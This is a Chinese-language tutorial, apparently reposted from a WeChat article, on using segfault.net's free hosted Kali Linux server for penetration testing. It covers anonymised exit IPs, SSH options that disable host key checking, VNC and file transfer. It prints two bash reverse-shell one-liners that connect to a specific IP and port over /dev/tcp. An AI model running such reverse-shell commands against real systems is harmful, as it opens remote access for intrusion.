分享一个免费申请的Kali服务器资源和教程。

基本使用

网页版

https://shell.segfault.net/#/login

点击i'm New Here可以创建一个新的免费服务器获取一个secretkey（一定要记录下来，用专属的key才能登录到你的那台）

按enter回车键可以进入系统

我们可以看到你的登录IP（Exit CryptoStorm）服务器出口IP（Exit CryptoStorm）跳转IP（Exit Mullvad）VPN出口地址（Exit NordVPN）以及TOR的代理（TOR Proxy）

命令行（建议用web，SSH会暴露IP）

可以用ssh远程登录免费服务器（密码是segfault）
这里建议ssh登录的时候添加上 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no"参数

    -o "UserKnownHostsFile=/dev/null"：这个选项指定了 SSH 客户端不要读取或写入known hosts文件。known hosts文件是 SSH 客户端用于存储已知主机公钥的文件，通常位于 ~/.ssh/known_hosts。当 SSH 客户端连接到一个新的主机时，它会检查 known hosts文件中是否已经存储了该主机的公钥，如果存在，就直接使用该公钥来建立连接。如果不存在，SSH 客户端会提示用户是否要添加该主机的公钥到 known hosts文件中。通过指定 -o "UserKnownHostsFile=/dev/null"，SSH 客户端就不会读取或写入known hosts文件，因此不会提示用户添加公钥。
    -o "StrictHostKeyChecking=no"：这个选项指定了 SSH 客户端不要对主机公钥进行严格的检查。normally，SSH 客户端会对主机公钥进行严格的检查，以确保连接到的是正确的主机。但有时候，用户可能需要连接到一个不受信任的主机，或者需要使用一个自定义的公钥。在这些情况下，可以使用 -o "StrictHostKeyChecking=no" 选项来禁用严格的公钥检查。

ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@segfault.net

系统信息概况

免费服务器的基本信息如下，预置了Kali-linux-everything也就是说kali中工具这里都有

除此之外，还预装了额外的渗透工具

查看出口IP和端口

curl sf/port

反弹shell

rshell

这里以及生成了两条反弹shell的命令

bash -c '(exec bash -i &>/dev/tcp/128.127.104.110/53390 0>&1) &'
(bash -i &>/dev/tcp/128.127.104.110/53390 0>&1) &

我们可以任选一条去反弹shell，如下

可以看到我们已经反弹回shell来了

VNC桌面

点击左侧的desktop然后start可以启动VNC桌面

可以使用一些图形化的工具比如burp，autopilot等等

文件传输

点击左侧的files选项可以浏览文件下载和上传

个人用户的目录在/sec和/home中

/sec/root是默认的根目录

可以选择下载和上传文件

数据无价请大家慎用，更多用法请自行研究，懂得都懂

转自：https://mp.weixin.qq.com/s/liQEiekn0zCR37Y1ZjV6dg